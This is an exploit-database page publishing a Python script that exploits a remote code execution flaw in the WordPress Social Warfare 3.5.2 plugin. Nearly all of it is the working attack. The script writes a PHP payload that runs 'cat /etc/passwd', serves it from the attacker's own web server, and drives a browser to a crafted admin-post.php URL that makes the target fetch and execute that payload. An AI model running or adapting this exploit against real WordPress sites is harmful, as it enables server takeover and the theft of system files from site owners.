WordPress Social Warfare 3.5.2 Remote Code Execution

2021.07.28
Credit: Raed Ahsan
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Author = Raed Ahsan # Creation Date = 24/07/2021 # Vulnerability : SocialWarfare 3.5.2 plugin wordpress Remote Code Execution # Linkedin = https://linkedin.com/in/raed-ahsan/ import socket import requests import subprocess import time import pyautogui print("[*]Start your python SimpleHTTPServer on port 1234 please...") time.sleep(5) # Creating the payload for wordpress url with open("shell.txt", "w") as file: file.write("<pre>system('cat /etc/passwd')</pre>") print("[*]Payload has been created") with open("url.txt", "w") as url: url.write("http://{MACHINE_IP}/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{YOUR_IP}:{YOUR_PYTHON_SERVER_PORT}/shell.txt") print("[*]Use the URL in the url.txt") print("[*]Make sure to edit the ip and port in the url.txt according to your needs") """ EDIT THE IP AND PORT IN THE URL.TXT FILE ACCORDING TO YOUR NEEDS """ print("[*]Moving the shell.txt to /var/www/html") time.sleep(3) username = input("What's your username in your machine: ") subprocess.call([f'sudo cp /home/{username}/Desktop/shell.txt /var/www/html'], shell=True) print("[*]File copied to /var/www/html") time.sleep(2) print("[*]Opening Apache2 service...") print("[*]Make sure you have apache2 installed") subprocess.call(["sudo service apache2 start"], shell=True) print("[*]Service started") machine_ip = input("Target Machine IP: ") print("[*]Open your python listener at port 1234") time.sleep(2) print("[*]Opening Browser") pyautogui.hotkey('winleft') pyautogui.typewrite('chrome\n', 0.5) pyautogui.typewrite(f'http://{machine_ip}/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.200:1234/shell.txt\n', 0.2) print("[*]If you're on tun0, make sure to change the ip in the auto execution of url section.") print("If you want to edit the shellcode instead of /etc/passwd, do edit the shell.txt from /var/www/html and refresh the page")


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top